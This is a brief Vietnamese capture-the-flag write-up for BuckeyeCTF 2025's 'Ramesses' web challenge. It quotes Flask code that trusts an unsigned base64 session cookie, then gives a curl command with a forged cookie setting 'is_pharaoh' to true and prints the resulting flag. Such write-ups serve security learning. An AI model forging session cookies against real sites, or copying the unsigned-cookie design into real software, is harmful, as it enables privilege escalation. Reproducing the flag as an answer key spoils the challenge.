Đề bài
Giải
Trong source code có đoạn kiểm tra Cookies sau
@app.route("/", methods=["GET", "POST"])
def home():
if request.method == "POST":
name = request.form.get("name", "")
cookie_data = {"name": name, "is_pharaoh": False}
encoded = base64.b64encode(json.dumps(cookie_data).encode()).decode()
response = make_response(redirect(url_for("tomb")))
response.set_cookie("session", encoded)
return response
return render_template("index.html")
@app.route("/tomb")
def tomb():
session_cookie = request.cookies.get("session")
if not session_cookie:
return redirect(url_for("home"))
try:
user = json.loads(base64.b64decode(session_cookie).decode())
except Exception:
return redirect(url_for("home"))
return render_template("tomb.html", user=user, flag=flag)Vậy chỉ cần mình là pharaoh là được
┌──(kali㉿kali)-[BuckeyeCTF 2025/beginner/Ramesses]
└─$ curl -s -b "session=eyJuYW1lIjoiUGhhcmFvaCBEYXZlIFJhbWVzc2VzIiwiaXNfcGhhcmFvaCI6dHJ1ZX0=" https://ramesses.challs.pwnoh.io/tomb
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<title>Welcome</title>
<link
rel="stylesheet"
href="/static/main.css"
/>
</head>
<body>
<canvas id="sand-canvas" aria-hidden="true"></canvas>
<div class="content">
<div class="card">
<h1>Pharaoh Pharaoh Dave Ramesses</h1>
<p>
What a happy day! Heaven and earth rejoice, for thou art the great
lord of Egypt.
</p>
<p>All lands say unto him: The flag is bctf{s0_17_w45_wr177en_50_1t_w45_d0n3}</p>
<a class="button" href="/logout">Depart</a>
</div>
</div>
<script src="/static/sand.js" defer></script>
</body>
</html>Flag
Flag: bctf{s0_17_w45_wr177en_50_1t_w45_d0n3}
'WriteUp > Web' 카테고리의 다른 글
| Web - UofTCTF 2026 (2) | 2026.01.13 |
|---|---|
| ebg13 - BuckeyeCTF 2025 (0) | 2025.11.09 |
| 5571 (0) | 2025.11.04 |
| Mark The Lyrics (0) | 2025.11.01 |
| Tiny Flag (0) | 2025.11.01 |